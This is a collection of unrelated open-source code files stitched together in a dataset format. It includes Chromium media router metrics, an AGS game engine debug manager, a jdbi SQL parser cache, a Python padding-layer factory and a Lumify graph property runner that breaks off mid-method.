  return item->uid;
}
/* Return true if the uid in both int tree maps are equal.
   Note: only the UID participates in equality, not the tree.  */
inline bool
int_tree_hasher::equal (const value_type *a, const compare_type *b)
{
  return (a->uid == b->uid);
}
typedef hash_table <int_tree_hasher> int_tree_htab_type;
#endif /* GCC_TREE_HASHER_H */
| 539
|
2,151
|
<filename>chrome/browser/media/router/mojo/media_router_mojo_metrics.cc
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/media/router/mojo/media_router_mojo_metrics.h"
#include "base/macros.h"
#include "base/metrics/histogram_macros.h"
#include "base/version.h"
#include "components/version_info/version_info.h"
#include "extensions/common/extension.h"
namespace media_router {
// Out-of-line definitions of the UMA histogram name constants declared in the
// header.  The ".WiredDisplay" variants split the wired-display provider out
// of the aggregate histogram of the same base name.
// static
constexpr char MediaRouterMojoMetrics::kHistogramProviderCreateRouteResult[] =
    "MediaRouter.Provider.CreateRoute.Result";
constexpr char
    MediaRouterMojoMetrics::kHistogramProviderCreateRouteResultWiredDisplay[] =
        "MediaRouter.Provider.CreateRoute.Result.WiredDisplay";
constexpr char MediaRouterMojoMetrics::kHistogramProviderJoinRouteResult[] =
    "MediaRouter.Provider.JoinRoute.Result";
constexpr char
    MediaRouterMojoMetrics::kHistogramProviderJoinRouteResultWiredDisplay[] =
        "MediaRouter.Provider.JoinRoute.Result.WiredDisplay";
constexpr char
    MediaRouterMojoMetrics::kHistogramProviderRouteControllerCreationOutcome[] =
        "MediaRouter.Provider.RouteControllerCreationOutcome";
constexpr char
    MediaRouterMojoMetrics::kHistogramProviderTerminateRouteResult[] =
        "MediaRouter.Provider.TerminateRoute.Result";
constexpr char MediaRouterMojoMetrics::
    kHistogramProviderTerminateRouteResultWiredDisplay[] =
        "MediaRouter.Provider.TerminateRoute.Result.WiredDisplay";
constexpr char MediaRouterMojoMetrics::kHistogramProviderVersion[] =
    "MediaRouter.Provider.Version";
constexpr char MediaRouterMojoMetrics::kHistogramProviderWakeReason[] =
    "MediaRouter.Provider.WakeReason";
constexpr char MediaRouterMojoMetrics::kHistogramProviderWakeup[] =
    "MediaRouter.Provider.Wakeup";
// static
// Records to UMA which event caused the media route provider to be woken.
void MediaRouterMojoMetrics::RecordMediaRouteProviderWakeReason(
    MediaRouteProviderWakeReason reason) {
  DCHECK_LT(static_cast<int>(reason),
            static_cast<int>(MediaRouteProviderWakeReason::TOTAL_COUNT));
  UMA_HISTOGRAM_ENUMERATION(
      kHistogramProviderWakeReason, static_cast<int>(reason),
      static_cast<int>(MediaRouteProviderWakeReason::TOTAL_COUNT));
}
// static
// Classifies the component extension's version relative to the running
// browser's version and records the bucket to UMA.
void MediaRouterMojoMetrics::RecordMediaRouteProviderVersion(
    const extensions::Extension& extension) {
  // Original code initialized |version| to UNKNOWN and then immediately
  // overwrote it — a dead store; initialize directly from the helper instead.
  const MediaRouteProviderVersion version = GetMediaRouteProviderVersion(
      extension.version(), version_info::GetVersion());
  DCHECK_LT(static_cast<int>(version),
            static_cast<int>(MediaRouteProviderVersion::TOTAL_COUNT));
  UMA_HISTOGRAM_ENUMERATION(
      kHistogramProviderVersion, static_cast<int>(version),
      static_cast<int>(MediaRouteProviderVersion::TOTAL_COUNT));
}
// static
// Records to UMA the outcome of an attempt to wake the media route provider.
void MediaRouterMojoMetrics::RecordMediaRouteProviderWakeup(
    MediaRouteProviderWakeup wakeup) {
  DCHECK_LT(static_cast<int>(wakeup),
            static_cast<int>(MediaRouteProviderWakeup::TOTAL_COUNT));
  UMA_HISTOGRAM_ENUMERATION(
      kHistogramProviderWakeup, static_cast<int>(wakeup),
      static_cast<int>(MediaRouteProviderWakeup::TOTAL_COUNT));
}
// static
// Records the result of a CreateRoute request, split per provider: wired
// display gets its own histogram; all other providers (intentional
// fallthrough below) share the aggregate histogram.
void MediaRouterMojoMetrics::RecordCreateRouteResultCode(
    MediaRouteProviderId provider_id,
    RouteRequestResult::ResultCode result_code) {
  DCHECK_LT(result_code, RouteRequestResult::TOTAL_COUNT);
  switch (provider_id) {
    case MediaRouteProviderId::WIRED_DISPLAY:
      UMA_HISTOGRAM_ENUMERATION(kHistogramProviderCreateRouteResultWiredDisplay,
                                result_code, RouteRequestResult::TOTAL_COUNT);
      break;
    case MediaRouteProviderId::EXTENSION:
    // TODO(crbug.com/809249): Implement Cast-specific metric.
    case MediaRouteProviderId::CAST:
    // TODO(crbug.com/808720): Implement DIAL-specific metric.
    case MediaRouteProviderId::DIAL:
    case MediaRouteProviderId::UNKNOWN:
      UMA_HISTOGRAM_ENUMERATION(kHistogramProviderCreateRouteResult,
                                result_code, RouteRequestResult::TOTAL_COUNT);
      break;
  }
}
// static
// Records the result of a JoinRoute request; same per-provider split as
// RecordCreateRouteResultCode (fallthrough to the aggregate histogram is
// intentional).
void MediaRouterMojoMetrics::RecordJoinRouteResultCode(
    MediaRouteProviderId provider_id,
    RouteRequestResult::ResultCode result_code) {
  DCHECK_LT(result_code, RouteRequestResult::ResultCode::TOTAL_COUNT);
  switch (provider_id) {
    case MediaRouteProviderId::WIRED_DISPLAY:
      UMA_HISTOGRAM_ENUMERATION(kHistogramProviderJoinRouteResultWiredDisplay,
                                result_code, RouteRequestResult::TOTAL_COUNT);
      break;
    case MediaRouteProviderId::EXTENSION:
    // TODO(crbug.com/809249): Implement Cast-specific metric.
    case MediaRouteProviderId::CAST:
    // TODO(crbug.com/808720): Implement DIAL-specific metric.
    case MediaRouteProviderId::DIAL:
    case MediaRouteProviderId::UNKNOWN:
      UMA_HISTOGRAM_ENUMERATION(kHistogramProviderJoinRouteResult, result_code,
                                RouteRequestResult::TOTAL_COUNT);
      break;
  }
}
// static
// Records the result of a TerminateRoute request; same per-provider split as
// the Create/Join recorders above.
void MediaRouterMojoMetrics::RecordMediaRouteProviderTerminateRoute(
    MediaRouteProviderId provider_id,
    RouteRequestResult::ResultCode result_code) {
  DCHECK_LT(result_code, RouteRequestResult::ResultCode::TOTAL_COUNT);
  switch (provider_id) {
    case MediaRouteProviderId::WIRED_DISPLAY:
      UMA_HISTOGRAM_ENUMERATION(
          kHistogramProviderTerminateRouteResultWiredDisplay, result_code,
          RouteRequestResult::TOTAL_COUNT);
      break;
    case MediaRouteProviderId::EXTENSION:
    // TODO(crbug.com/809249): Implement Cast-specific metric.
    case MediaRouteProviderId::CAST:
    // TODO(crbug.com/808720): Implement DIAL-specific metric.
    case MediaRouteProviderId::DIAL:
    case MediaRouteProviderId::UNKNOWN:
      UMA_HISTOGRAM_ENUMERATION(kHistogramProviderTerminateRouteResult,
                                result_code, RouteRequestResult::TOTAL_COUNT);
      break;
  }
}
// static
// Records whether creating a media route controller succeeded.
void MediaRouterMojoMetrics::RecordMediaRouteControllerCreationResult(
    bool success) {
  UMA_HISTOGRAM_BOOLEAN(kHistogramProviderRouteControllerCreationOutcome,
                        success);
}
// static
// Buckets the extension version against the browser version by comparing
// major version components only.  An extension major >= browser major is
// treated as "same version"; invalid or zero majors map to UNKNOWN.
MediaRouteProviderVersion MediaRouterMojoMetrics::GetMediaRouteProviderVersion(
    const base::Version& extension_version,
    const base::Version& browser_version) {
  if (!extension_version.IsValid() || extension_version.components().empty() ||
      !browser_version.IsValid() || browser_version.components().empty()) {
    return MediaRouteProviderVersion::UNKNOWN;
  }
  uint32_t extension_major = extension_version.components()[0];
  uint32_t browser_major = browser_version.components()[0];
  // Sanity check.
  if (extension_major == 0 || browser_major == 0) {
    return MediaRouteProviderVersion::UNKNOWN;
  } else if (extension_major >= browser_major) {
    return MediaRouteProviderVersion::SAME_VERSION_AS_CHROME;
  } else if (browser_major - extension_major == 1) {
    return MediaRouteProviderVersion::ONE_VERSION_BEHIND_CHROME;
  } else {
    return MediaRouteProviderVersion::MULTIPLE_VERSIONS_BEHIND_CHROME;
  }
}
}  // namespace media_router
| 2,603
|
450
|
//=============================================================================
//
// Adventure Game Studio (AGS)
//
// Copyright (C) 1999-2011 <NAME> and 2011-20xx others
// The full list of copyright holders can be found in the Copyright.txt
// file, which is part of this source code distribution.
//
// The AGS source code is provided under the Artistic License 2.0.
// A copy of this license can be found in the file License.txt and at
// http://www.opensource.org/licenses/artistic-license-2.0.php
//
//=============================================================================
#include <stdarg.h>
#include "debug/debugmanager.h"
#include "util/string_types.h"
namespace AGS
{
namespace Common
{
// A single output target (log sink) with a per-group verbosity filter.
// Filter slots are indexed by numeric group ID; one slot per group known to
// the global DebugManager at construction time, defaulting to def_verbosity.
DebugOutput::DebugOutput(const String &id, IOutputHandler *handler, MessageType def_verbosity, bool enabled)
    : _id(id)
    , _handler(handler)
    , _enabled(enabled)
    , _defaultVerbosity(def_verbosity)
{
    _groupFilter.resize(DbgMgr._lastGroupID + 1, _defaultVerbosity);
}
// Returns this output's string identifier.
String DebugOutput::GetID() const
{
    return _id;
}
// Returns the handler that actually prints messages (ownership not taken here).
IOutputHandler *DebugOutput::GetHandler() const
{
    return _handler;
}
// Tells whether this output currently accepts messages at all.
bool DebugOutput::IsEnabled() const
{
    return _enabled;
}
// Enables or disables this output as a whole (group filters are kept).
void DebugOutput::SetEnabled(bool enable)
{
    _enabled = enable;
}
// Sets the verbosity filter for one group.  If the group cannot be resolved
// yet (e.g. referenced by name before registration), the request is parked in
// _unresolvedGroups and applied later by ResolveGroupID().
void DebugOutput::SetGroupFilter(DebugGroupID id, MessageType verbosity)
{
    uint32_t key = DbgMgr.GetGroup(id).UID.ID;
    if (key != kDbgGroup_None)
        _groupFilter[key] = verbosity;
    else
        _unresolvedGroups.insert(std::make_pair(id.SID, verbosity));
}
// Applies one verbosity to every known filter slot and every pending request.
void DebugOutput::SetAllGroupFilters(MessageType verbosity)
{
    for (auto &group : _groupFilter)
        group = verbosity;
    for (auto &group : _unresolvedGroups)
        group.second = verbosity;
}
// Mutes all groups and drops any pending (unresolved) filter requests.
void DebugOutput::ClearGroupFilters()
{
    for (auto &gf : _groupFilter)
        gf = kDbgMsg_None;
    _unresolvedGroups.clear();
}
// Resolves a (possibly name-only) group reference: grows the filter array to
// cover the group's numeric ID and applies any verbosity request that was
// parked for it in _unresolvedGroups.
void DebugOutput::ResolveGroupID(DebugGroupID id)
{
    if (!id.IsValid())
        return;
    DebugGroupID real_id = DbgMgr.GetGroup(id).UID;
    if (real_id.IsValid())
    {
        // Size the filter against the *resolved* numeric ID.  The original
        // code resized using id.ID but indexed with real_id.ID; for a
        // string-only DebugGroupID whose numeric part is unset, that could
        // write past the end of _groupFilter.
        if (_groupFilter.size() <= real_id.ID)
            _groupFilter.resize(real_id.ID + 1, _defaultVerbosity);
        GroupNameToMTMap::const_iterator it = _unresolvedGroups.find(real_id.SID);
        if (it != _unresolvedGroups.end())
        {
            _groupFilter[real_id.ID] = it->second;
            _unresolvedGroups.erase(it);
        }
    }
}
// Tells whether a message of type `mt` in group `id` passes this output's
// per-group verbosity filter.  Unknown or out-of-range groups never pass.
bool DebugOutput::TestGroup(DebugGroupID id, MessageType mt) const
{
    const DebugGroupID resolved = DbgMgr.GetGroup(id).UID;
    if (resolved.ID == kDbgGroup_None || resolved.ID >= _groupFilter.size())
        return false;
    return _groupFilter[resolved.ID] >= mt;
}
// Registers the engine's built-in debug groups with fixed IDs, then positions
// the free-ID counter right after them for dynamically registered groups.
DebugManager::DebugManager()
{
    // Add hardcoded groups
    RegisterGroup(DebugGroup(DebugGroupID(kDbgGroup_Main, "main"), ""));
    RegisterGroup(DebugGroup(DebugGroupID(kDbgGroup_Game, "game"), "Game"));
    RegisterGroup(DebugGroup(DebugGroupID(kDbgGroup_Script, "script"), "Script"));
    RegisterGroup(DebugGroup(DebugGroupID(kDbgGroup_SprCache, "sprcache"), "Sprite cache"));
    RegisterGroup(DebugGroup(DebugGroupID(kDbgGroup_ManObj, "manobj"), "Managed obj"));
    _firstFreeGroupID = _groups.size();
    _lastGroupID = _firstFreeGroupID;
}
// Looks a group up by numeric ID first, falling back to its string ID.
// Returns a default-constructed (invalid) DebugGroup when not found.
DebugGroup DebugManager::GetGroup(DebugGroupID id)
{
    if (id.ID != kDbgGroup_None)
    {
        return id.ID < _groups.size() ? _groups[id.ID] : DebugGroup();
    }
    else if (!id.SID.IsEmpty())
    {
        GroupByStringMap::const_iterator it = _groupByStrLookup.find(id.SID);
        return it != _groupByStrLookup.end() ? _groups[it->second.ID] : DebugGroup();
    }
    return DebugGroup();
}
// Returns the registered output with the given id, or a null pointer.
PDebugOutput DebugManager::GetOutput(const String &id)
{
    OutMap::const_iterator it = _outputs.find(id);
    return it != _outputs.end() ? it->second.Target : PDebugOutput();
}
// Registers a group under a fresh numeric ID (or returns the existing group
// when the string ID is already taken), then lets every output resolve any
// pending filter requests for it.
DebugGroup DebugManager::RegisterGroup(const String &id, const String &out_name)
{
    DebugGroup group = GetGroup(id);
    if (group.UID.IsValid())
        return group;
    group = DebugGroup(DebugGroupID(++DbgMgr._lastGroupID, id), out_name);
    _groups.push_back(group);
    _groupByStrLookup[group.UID.SID] = group.UID;
    // Resolve group reference on every output target
    for (OutMap::const_iterator it = _outputs.begin(); it != _outputs.end(); ++it)
    {
        it->second.Target->ResolveGroupID(group.UID);
    }
    return group;
}
// Registers a group with a caller-chosen numeric ID (used for the hardcoded
// groups); overwrites any existing slot at that ID.
void DebugManager::RegisterGroup(const DebugGroup &group)
{
    if (_groups.size() <= group.UID.ID)
        _groups.resize(group.UID.ID + 1);
    _groups[group.UID.ID] = group;
    _groupByStrLookup[group.UID.SID] = group.UID;
}
// Registers (or replaces) an output target under the given id and returns the
// shared pointer to it.  Uses a single map lookup instead of the original
// three `_outputs[id]` lookups.
PDebugOutput DebugManager::RegisterOutput(const String &id, IOutputHandler *handler, MessageType def_verbosity, bool enabled)
{
    OutputSlot &slot = _outputs[id];
    slot.Target = PDebugOutput(new DebugOutput(id, handler, def_verbosity, enabled));
    slot.Suppressed = false;
    return slot.Target;
}
// Drops all dynamically registered groups and every output target, and resets
// the ID counter back to the first free (non-hardcoded) slot.
void DebugManager::UnregisterAll()
{
    _lastGroupID = _firstFreeGroupID;
    _groups.clear();
    _groupByStrLookup.clear();
    _outputs.clear();
}
// Clears one group's slot; its numeric ID is not reused while others remain.
void DebugManager::UnregisterGroup(DebugGroupID id)
{
    DebugGroup group = GetGroup(id);
    if (!group.UID.IsValid())
        return;
    _groups[group.UID.ID] = DebugGroup();
    _groupByStrLookup.erase(group.UID.SID);
}
// Removes one output target by id (no-op if absent).
void DebugManager::UnregisterOutput(const String &id)
{
    _outputs.erase(id);
}
// Broadcasts a message from the given group to every registered output.
void DebugManager::Print(DebugGroupID group_id, MessageType mt, const String &text)
{
    const DebugGroup &group = GetGroup(group_id);
    DebugMessage msg(text, group.UID.ID, group.OutputName, mt);
    for (OutMap::iterator it = _outputs.begin(); it != _outputs.end(); ++it)
    {
        SendMessage(it->second, msg);
    }
}
// Sends a prepared message to one specific output by id (no-op if absent).
void DebugManager::SendMessage(const String &out_id, const DebugMessage &msg)
{
    OutMap::iterator it = _outputs.find(out_id);
    if (it != _outputs.end())
        SendMessage(it->second, msg);
}
// Delivers a message to one output slot, honoring its enabled flag and group
// filter, and guarding against recursive logging from the handler itself.
void DebugManager::SendMessage(OutputSlot &out, const DebugMessage &msg)
{
    IOutputHandler *handler = out.Target->GetHandler();
    if (!handler || !out.Target->IsEnabled() || out.Suppressed)
        return;
    if (!out.Target->TestGroup(msg.GroupID, msg.MT))
        return;
    // We suppress current target before the call so that if it makes
    // a call to output system itself, message would not print to the
    // same target
    out.Suppressed = true;
    handler->PrintMessage(msg);
    out.Suppressed = false;
}
// TODO: move this to the dynamically allocated engine object whenever it is implemented
// Global debug manager instance used by the Debug::Printf helpers below.
DebugManager DbgMgr;
namespace Debug
{
// Convenience wrappers that forward to DbgMgr.Print; the variants without an
// explicit group/type log to the "main" group at default verbosity.
void Printf(const String &text)
{
    DbgMgr.Print(kDbgGroup_Main, kDbgMsg_Default, text);
}
void Printf(MessageType mt, const String &text)
{
    DbgMgr.Print(kDbgGroup_Main, mt, text);
}
void Printf(DebugGroupID group, MessageType mt, const String &text)
{
    DbgMgr.Print(group, mt, text);
}
// printf-style variants; formatting is done once via String::FromFormatV.
void Printf(const char *fmt, ...)
{
    va_list argptr;
    va_start(argptr, fmt);
    DbgMgr.Print(kDbgGroup_Main, kDbgMsg_Default, String::FromFormatV(fmt, argptr));
    va_end(argptr);
}
void Printf(MessageType mt, const char *fmt, ...)
{
    va_list argptr;
    va_start(argptr, fmt);
    DbgMgr.Print(kDbgGroup_Main, mt, String::FromFormatV(fmt, argptr));
    va_end(argptr);
}
void Printf(DebugGroupID group, MessageType mt, const char *fmt, ...)
{
    va_list argptr;
    va_start(argptr, fmt);
    DbgMgr.Print(group, mt, String::FromFormatV(fmt, argptr));
    va_end(argptr);
}
} // namespace Debug
} // namespace Common
} // namespace AGS
| 2,868
|
552
|
<reponame>WinsomLow/CPP-3D-Game-Tutorial-Series
#include "Resource.h"
Resource::Resource(const wchar_t* full_path): m_full_path(full_path)
{
}
Resource::~Resource()
{
}
| 73
|
435
|
<filename>warehouse/query-core/src/main/java/datawave/query/tld/TLDTermFrequencyAggregator.java<gh_stars>100-1000
package datawave.query.tld;
import datawave.query.jexl.functions.TermFrequencyAggregator;
import datawave.query.predicate.EventDataQueryFilter;
import org.apache.accumulo.core.data.ByteSequence;
import java.util.ArrayList;
import java.util.Set;
/**
 * TermFrequencyAggregator which will treat all TF uid's as the TLD uid for the purposes of aggregation.
 */
public class TLDTermFrequencyAggregator extends TermFrequencyAggregator {
    public TLDTermFrequencyAggregator(Set<String> fieldsToKeep, EventDataQueryFilter attrFilter, int maxNextCount) {
        super(fieldsToKeep, attrFilter, maxNextCount);
    }

    /**
     * Truncates the uid portion of the column qualifier to the top-level document uid:
     * a uid with more than two '.'-separated child segments is cut back after its third dot.
     */
    @Override
    protected ByteSequence parsePointer(ByteSequence qualifier) {
        // Offsets of the null-byte separators delimiting the uid within the qualifier.
        ArrayList<Integer> nullOffsets = TLD.instancesOf(0, qualifier, -1);
        final int uidStart = nullOffsets.get(0);
        final int uidStop = nullOffsets.get(1);
        ByteSequence uid = qualifier.subSequence(uidStart + 1, uidStop);
        // Offsets of the '.' separators inside the uid itself.
        ArrayList<Integer> dotOffsets = TLD.instancesOf('.', uid);
        if (dotOffsets.size() > 2) {
            // Keep everything up to (and including) the third dot: the TLD uid.
            return qualifier.subSequence(0, uidStart + dotOffsets.get(2) + 1);
        }
        // Already a TLD uid; keep the qualifier up to the uid's end.
        return qualifier.subSequence(0, uidStop);
    }
}
| 519
|
424
|
import torch.nn as nn

# Registry mapping padding-type names to the corresponding nn padding layers.
PADDING_LAYERS = {
    'zero': nn.ZeroPad2d,
    'reflect': nn.ReflectionPad2d,
    'replicate': nn.ReplicationPad2d
}


def build_padding_layer(cfg, *args, **kwargs):
    """Build padding layer.

    Args:
        cfg (dict): The padding layer config, which should contain:

            - typename (str): Layer type, one of the keys of
              ``PADDING_LAYERS`` ('zero', 'reflect' or 'replicate').
            - layer args: Args needed to instantiate a padding layer.
        *args: Positional args forwarded to the padding layer constructor.
        **kwargs: Keyword args forwarded to the padding layer constructor.

    Returns:
        nn.Module: Created padding layer.

    Raises:
        TypeError: If ``cfg`` is not a dict (``None`` is not accepted).
        KeyError: If ``cfg`` lacks the key ``typename`` or names an
            unrecognized padding type.
    """
    # NOTE: the original docstring documented the key as "type" and claimed
    # None was allowed; the code has always required a dict with "typename".
    if not isinstance(cfg, dict):
        raise TypeError('cfg must be a dict')
    if 'typename' not in cfg:
        raise KeyError('the cfg dict must contain the key "typename"')
    cfg_ = cfg.copy()

    padding_type = cfg_.pop('typename')
    if padding_type not in PADDING_LAYERS:
        raise KeyError(f'Unrecognized padding type {padding_type}.')
    padding_layer = PADDING_LAYERS[padding_type]
    return padding_layer(*args, **kwargs, **cfg_)
| 404
|
700
|
#include <CommonCrypto/CommonDigestSPI.h>
/* Placeholder value used where no digest is available. */
#define kNone "none"
/* Buffer length needed for a NUL-terminated hex SHA-256 digest string. */
extern const int kSHA256NullTerminatedBuffLen;
/* Convenience wrappers: digest the file at path f into buffer b using the
   named algorithm. */
#define MD5File(f, b) Digest_File(kCCDigestMD5, f, b)
#define SHA1_File(f, b) Digest_File(kCCDigestSHA1, f, b)
#define RIPEMD160_File(f, b) Digest_File(kCCDigestRMD160, f, b)
#define SHA256_File(f, b) Digest_File(kCCDigestSHA256, f, b)
/* Digest the file contents with the given CommonCrypto algorithm into buf;
   presumably returns buf (or NULL on failure) — TODO confirm in the .c file. */
char *Digest_File(CCDigestAlg algorithm, const char *filename, char *buf);
/* SHA-256 over a path's extended attributes / ACL; caller supplies buf,
   assumed at least kSHA256NullTerminatedBuffLen bytes — TODO confirm. */
char *SHA256_Path_XATTRs(char *path, char *buf);
char *SHA256_Path_ACL(char *path, char *buf);
|
44,968
|
{
"name": "test_run_custom_script",
"version": "1.0.0",
"license": "UNLICENSED",
"scripts": {
"custom-script": "node echo.js"
}
}
| 66
|
1,396
|
<reponame>drunderscore/jdbi
/*
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.jdbi.v3.core.statement;
import com.github.benmanes.caffeine.cache.Caffeine;
import com.github.benmanes.caffeine.cache.LoadingCache;
import com.github.benmanes.caffeine.cache.stats.CacheStats;
import org.jdbi.v3.meta.Beta;
/**
 * Base class for SQL parsers that memoize their results: parsed statements
 * are kept in a Caffeine cache keyed by the raw SQL string, so repeated
 * statements skip re-parsing.
 */
abstract class CachingSqlParser implements SqlParser {
    private final LoadingCache<String, ParsedSql> parsedSqlCache;
    CachingSqlParser() {
        // Default cache: bounded at 1000 distinct SQL strings.
        this(Caffeine.newBuilder()
                .maximumSize(1_000));
    }
    CachingSqlParser(Caffeine<Object, Object> cache) {
        // Cache misses are populated by the subclass-supplied parse routine.
        parsedSqlCache = cache.build(this::internalParse);
    }
    @Override
    public ParsedSql parse(String sql, StatementContext ctx) {
        try {
            return parsedSqlCache.get(sql);
        } catch (IllegalArgumentException e) {
            // Parse failures surface from the loader as IllegalArgumentException.
            throw new UnableToCreateStatementException("Exception parsing for named parameter replacement", e, ctx);
        }
    }
    /** Returns statistics of the underlying parse cache. */
    @Beta
    public CacheStats cacheStats() {
        return parsedSqlCache.stats();
    }
    /** Performs the actual (uncached) parse of the given SQL. */
    abstract ParsedSql internalParse(String sql);
}
|
375
|
package io.lumify.core.ingest.graphProperty;
import com.google.inject.Inject;
import io.lumify.core.bootstrap.InjectHelper;
import io.lumify.core.config.Configuration;
import io.lumify.core.exception.LumifyException;
import io.lumify.core.ingest.WorkerSpout;
import io.lumify.core.model.properties.LumifyProperties;
import io.lumify.core.model.user.UserRepository;
import io.lumify.core.model.workQueue.WorkQueueRepository;
import io.lumify.core.security.VisibilityTranslator;
import io.lumify.core.user.User;
import io.lumify.core.util.LumifyLogger;
import io.lumify.core.util.LumifyLoggerFactory;
import io.lumify.core.util.ServiceLoaderUtil;
import io.lumify.core.util.TeeInputStream;
import org.apache.commons.io.IOUtils;
import org.apache.hadoop.fs.FileSystem;
import org.json.JSONObject;
import org.securegraph.*;
import org.securegraph.property.StreamingPropertyValue;
import org.securegraph.util.IterableUtils;
import java.io.*;
import java.net.URI;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
import java.util.Set;
import static org.securegraph.util.IterableUtils.toList;
/**
 * Pulls work tuples off a worker spout and runs every interested
 * {@link GraphPropertyWorker} (each on its own thread, via
 * {@link GraphPropertyThreadedWrapper}) against the referenced graph element
 * property.  Streaming property values are fanned out to all interested
 * workers through a {@link TeeInputStream}.
 */
public class GraphPropertyRunner {
    private static final LumifyLogger LOGGER = LumifyLoggerFactory.getLogger(GraphPropertyRunner.class);
    private Graph graph;
    private Authorizations authorizations;
    private List<GraphPropertyThreadedWrapper> workerWrappers;
    private User user;
    private UserRepository userRepository;
    private Configuration configuration;
    private WorkQueueRepository workQueueRepository;
    private VisibilityTranslator visibilityTranslator;
    // Loop flag for run(); cleared by stop().  NOTE(review): not volatile, so a
    // stop() from another thread may not be seen promptly — confirm intended.
    private boolean shouldRun;
    /** Resolves the user's authorizations and starts all worker threads. */
    public void prepare(User user) {
        this.user = user;
        this.authorizations = this.userRepository.getAuthorizations(this.user);
        prepareWorkers();
    }
    // Discovers all GraphPropertyWorker services, prepares each one, and spins
    // up one named thread per worker.  Throws only after attempting them all.
    private void prepareWorkers() {
        FileSystem hdfsFileSystem = getFileSystem();
        List<TermMentionFilter> termMentionFilters = loadTermMentionFilters(hdfsFileSystem);
        GraphPropertyWorkerPrepareData workerPrepareData = new GraphPropertyWorkerPrepareData(
                configuration.toMap(),
                termMentionFilters,
                hdfsFileSystem,
                this.user,
                this.authorizations,
                InjectHelper.getInjector());
        Collection<GraphPropertyWorker> workers = InjectHelper.getInjectedServices(GraphPropertyWorker.class, configuration);
        this.workerWrappers = new ArrayList<>(workers.size());
        boolean failedToPrepareAtLeastOneGraphPropertyWorker = false;
        for (GraphPropertyWorker worker : workers) {
            try {
                LOGGER.debug("preparing: %s", worker.getClass().getName());
                worker.prepare(workerPrepareData);
            } catch (Exception ex) {
                LOGGER.error("Could not prepare graph property worker %s", worker.getClass().getName(), ex);
                failedToPrepareAtLeastOneGraphPropertyWorker = true;
            }
            GraphPropertyThreadedWrapper wrapper = new GraphPropertyThreadedWrapper(worker);
            InjectHelper.inject(wrapper);
            workerWrappers.add(wrapper);
            Thread thread = new Thread(wrapper);
            String workerName = worker.getClass().getName();
            thread.setName("graphPropertyWorker-" + workerName);
            thread.start();
        }
        if (failedToPrepareAtLeastOneGraphPropertyWorker) {
            throw new LumifyException("Failed to initialize at least one graph property worker. See the log for more details.");
        }
    }
    // Opens the HDFS filesystem configured under Configuration.HADOOP_URL.
    private FileSystem getFileSystem() {
        FileSystem hdfsFileSystem;
        org.apache.hadoop.conf.Configuration conf = configuration.toHadoopConfiguration();
        try {
            String hdfsRootDir = configuration.get(Configuration.HADOOP_URL, null);
            hdfsFileSystem = FileSystem.get(new URI(hdfsRootDir), conf, "hadoop");
        } catch (Exception e) {
            throw new LumifyException("Could not open hdfs filesystem", e);
        }
        return hdfsFileSystem;
    }
    // Loads and prepares all TermMentionFilter services; any prepare failure
    // is fatal (unlike worker preparation above).
    private List<TermMentionFilter> loadTermMentionFilters(FileSystem hdfsFileSystem) {
        TermMentionFilterPrepareData termMentionFilterPrepareData = new TermMentionFilterPrepareData(
                configuration.toMap(),
                hdfsFileSystem,
                this.user,
                this.authorizations,
                InjectHelper.getInjector()
        );
        List<TermMentionFilter> termMentionFilters = toList(ServiceLoaderUtil.load(TermMentionFilter.class, configuration));
        for (TermMentionFilter termMentionFilter : termMentionFilters) {
            InjectHelper.inject(termMentionFilter);
            try {
                termMentionFilter.prepare(termMentionFilterPrepareData);
            } catch (Exception ex) {
                throw new LumifyException("Could not initialize term mention filter: " + termMentionFilter.getClass().getName(), ex);
            }
        }
        return termMentionFilters;
    }
    /**
     * Processes one work item.  The JSON must reference either a vertex
     * ("graphVertexId") or an edge ("graphEdgeId"); the remaining fields are
     * optional (JSONObject.optString returns "" when absent).
     */
    public void process(JSONObject json) throws Exception {
        String propertyKey = json.optString("propertyKey");
        String propertyName = json.optString("propertyName");
        String workspaceId = json.optString("workspaceId");
        String visibilitySource = json.optString("visibilitySource");
        String graphVertexId = json.optString("graphVertexId");
        if (graphVertexId != null && graphVertexId.length() > 0) {
            Vertex vertex = graph.getVertex(graphVertexId, this.authorizations);
            if (vertex == null) {
                throw new LumifyException("Could not find vertex with id " + graphVertexId);
            }
            safeExecute(vertex, propertyKey, propertyName, workspaceId, visibilitySource);
            return;
        }
        String graphEdgeId = json.optString("graphEdgeId");
        if (graphEdgeId != null && graphEdgeId.length() > 0) {
            Edge edge = graph.getEdge(graphEdgeId, this.authorizations);
            if (edge == null) {
                throw new LumifyException("Could not find edge with id " + graphEdgeId);
            }
            safeExecute(edge, propertyKey, propertyName, workspaceId, visibilitySource);
            return;
        }
        throw new LumifyException("Could not find graphVertexId or graphEdgeId");
    }
    // Resolves the (key, name) pair to a concrete Property on the element, or
    // to null when neither is given (meaning "process the whole element").
    private void safeExecute(Element element, String propertyKey, String propertyName, String workspaceId, String visibilitySource) throws Exception {
        Property property;
        if ((propertyKey == null || propertyKey.length() == 0) && (propertyName == null || propertyName.length() == 0)) {
            property = null;
        } else {
            if (propertyKey == null) {
                property = element.getProperty(propertyName);
            } else {
                property = element.getProperty(propertyKey, propertyName);
            }
            if (property == null) {
                LOGGER.error("Could not find property [%s]:[%s] on vertex with id %s", propertyKey, propertyName, element.getId());
                return;
            }
        }
        safeExecute(element, property, workspaceId, visibilitySource);
    }
    // Dispatches the work item to all interested workers; streaming values go
    // through the tee path, everything else is executed inline.
    private void safeExecute(Element element, Property property, String workspaceId, String visibilitySource) throws Exception {
        String propertyText = property == null ? "[none]" : (property.getKey() + ":" + property.getName());
        List<GraphPropertyThreadedWrapper> interestedWorkerWrappers = findInterestedWorkers(element, property);
        if (interestedWorkerWrappers.size() == 0) {
            LOGGER.info("Could not find interested workers for element %s property %s", element.getId(), propertyText);
            return;
        }
        if (LOGGER.isDebugEnabled()) {
            for (GraphPropertyThreadedWrapper interestedWorkerWrapper : interestedWorkerWrappers) {
